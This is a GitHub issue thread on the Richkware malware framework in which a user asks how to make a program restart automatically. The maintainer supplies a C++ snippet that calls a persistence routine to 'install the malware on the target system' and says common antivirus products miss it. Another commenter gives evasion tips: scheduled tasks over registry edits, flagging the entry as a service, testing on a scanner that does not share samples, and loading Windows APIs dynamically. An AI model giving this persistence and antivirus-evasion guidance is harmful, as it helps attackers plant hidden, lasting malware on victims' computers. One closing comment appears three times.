### ISSUE TITLE
Can you give me C++ script to start program automatically after running first time ?

### ISSUE THREAD

**Issue by Williiam786** [richkmeli/Richkware#2]

**Comment by OxMarco** [comment]
You have to use task scheduling API on Windows or editing the crontab on Unix systems. Altering the register on Windows would trigger the Antivirus. When setting the new entry, it would be advisable to flag it as a service.
[Task Scheduler (win)](https://msdn.microsoft.com/en-us/library/aa446802.aspx)

**Comment by richkmeli** [comment]
Hi @Williiam786 , you just need to call this function `richkware.systemStorage.Persistence();` in your main, and the framework will install the malware on the target system.

```
#include "src/richkware.h"

int main() {
    Richkware richkware("Richk","richktest");

    richkware.systemStorage.Persistence();
    
    // PUT YOUR CODE HERE

    return 0;

}
```

Hi @grcasanova, i remind you that Richkware only works on Windows. What you said about antiviruses is correct, but it depends on the case, I did a few tests with the most common antiviruses on the internet, but they didn't detect anything.

**Comment by OxMarco** [comment]
Hey @richkmeli, if I have time I will try to port it to Unix systems, but I'm pretty sure registry hacking is a red flag during heuristic analysis. I will carry out some tests too using nodistribute.com (VirusTotal sends samples to AV companies, but they probably also look on here).
Yu should also invoke Windows API dynamically with LoadLibrary and GetProcAddress

**Comment by richkmeli** [comment]
ok @grcasanova, let me know about the results.
if you need some more information, contact me on Telegram (@Richk)

**Comment by richkmeli** [comment]
ok @grcasanova, let me know about the results.
If you need some more information, contact me on Telegram ([Richk](https://telegram.me/Richk))

**Comment by richkmeli** [comment]
ok @grcasanova, let me know about the results.
If you need more information, contact me on Telegram ([Richk](https://telegram.me/Richk))
